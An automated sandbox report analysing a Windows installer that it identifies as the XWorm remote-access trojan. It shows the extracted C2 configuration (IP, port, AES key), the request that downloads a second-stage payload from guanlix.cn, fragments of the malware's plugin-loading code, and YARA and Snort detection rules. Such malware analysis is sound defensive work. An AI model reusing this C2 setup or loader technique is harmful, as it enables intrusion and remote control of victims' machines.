Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
33-o_Installer.exe

Overview

General Information

Sample name:33-o_Installer.exe
Analysis ID:1466306
MD5:baf30c254157b0f36a967ccfdb3850ed
SHA1:0734a94d3cd6b3048d6d99c26b1fdea0cd19ab00
SHA256:af40db9d594f00fe032b9b50177907efc872157abd3ab488c09584a0ceb3da04
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 33-o_Installer.exe (PID: 4292 cmdline: "C:\Users\user\Desktop\33-o_Installer.exe" MD5: BAF30C254157B0F36A967CCFDB3850ED)
  • cleanup
{"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x121f3:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\Public\Downloads\ind.codWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: 33-o_Installer.exe PID: 4292JoeSecurity_XWormYara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.33-o_Installer.exe.5820000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.33-o_Installer.exe.5820000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          0.2.33-o_Installer.exe.5820000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.33-o_Installer.exe.5820000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x4cf2:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            Timestamp:07/02/24-19:25:03.515460
            SID:2852870
            Source Port:7000
            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:25:03.516212
            SID:2852923
            Source Port:49705
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:23:08.005869
            SID:2853193
            Source Port:49705
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:21:17.025426
            SID:2855924
            Source Port:49705
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:24:50.403516
            SID:2852874
            Source Port:7000
            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: 33-o_Installer.exeReversingLabs: Detection: 31%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 33-o_Installer.exeJoe Sandbox ML: detected
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpackString decryptor: 117.41.184.33
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpackString decryptor: 7000
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpackString decryptor: <123456789>
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpackString decryptor: XWorm V5.6
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpackString decryptor: USB.exe
            Source: 33-o_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 33-o_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 117.41.184.33:7000
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 117.41.184.33:7000 -> 192.168.2.5:49705
            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.5:49705 -> 117.41.184.33:7000
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 117.41.184.33:7000 -> 192.168.2.5:49705
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 117.41.184.33:7000
            Source: Malware configuration extractorURLs: 117.41.184.33
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49704
            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 91.208.240.157:881
            Source: global trafficTCP traffic: 192.168.2.5:49705 -> 117.41.184.33:7000
            Source: Joe Sandbox ViewASN Name: CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC25C8 __EH_prolog,InternetReadFile,0_2_00DC25C8
            Source: global trafficHTTP traffic detected: GET /33.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: guanlix.cn
            Source: 33-o_Installer.exeString found in binary or memory: http://guanlix.cn:881/33.ccp
            Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://guanlix.cn:881/33.ccp~
            Source: 33-o_Installer.exe, 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\Public\Downloads\ind.cod, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD007E0_2_00DD007E
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD5A2A0_2_00DD5A2A
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD0BD60_2_00DD0BD6
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DCFBE90_2_00DCFBE9
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD738F0_2_00DD738F
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD54D90_2_00DD54D9
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD041C0_2_00DD041C
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD66570_2_00DD6657
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD07EE0_2_00DD07EE
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD7F4F0_2_00DD7F4F
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD5F7B0_2_00DD5F7B
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_058355D80_2_058355D8
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_0583A6B80_2_0583A6B8
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_0583B3F80_2_0583B3F8
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_0583ED840_2_0583ED84
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_05834D080_2_05834D08
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_058307A00_2_058307A0
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_058349C00_2_058349C0
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: String function: 00DCA9B0 appears 45 times
            Source: 33-o_Installer.exe, 00000000.00000000.2037340785.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 33-o_Installer.exe
            Source: 33-o_Installer.exe, 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 33-o_Installer.exe
            Source: 33-o_Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 33-o_Installer.exe
            Source: 33-o_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\Public\Downloads\ind.cod, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/2
            Source: C:\Users\user\Desktop\33-o_Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccpJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeMutant created: NULL
            Source: C:\Users\user\Desktop\33-o_Installer.exeMutant created: \Sessions\1\BaseNamedObjects\20UmI84cKfMqQ1HH
            Source: 33-o_Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\33-o_Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 33-o_Installer.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: 33-o_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 33-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 33-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 33-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 33-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 33-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00DD40E4
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DCA9F5 push ecx; ret 0_2_00DCAA08
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC4948 push eax; ret 0_2_00DC4966
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC6649 push ecx; ret 0_2_00DC665C
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_0583C4D0 push eax; retf 034Fh0_2_0583D055
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_05836B88 pushad ; ret 0_2_05836B89

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49704
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
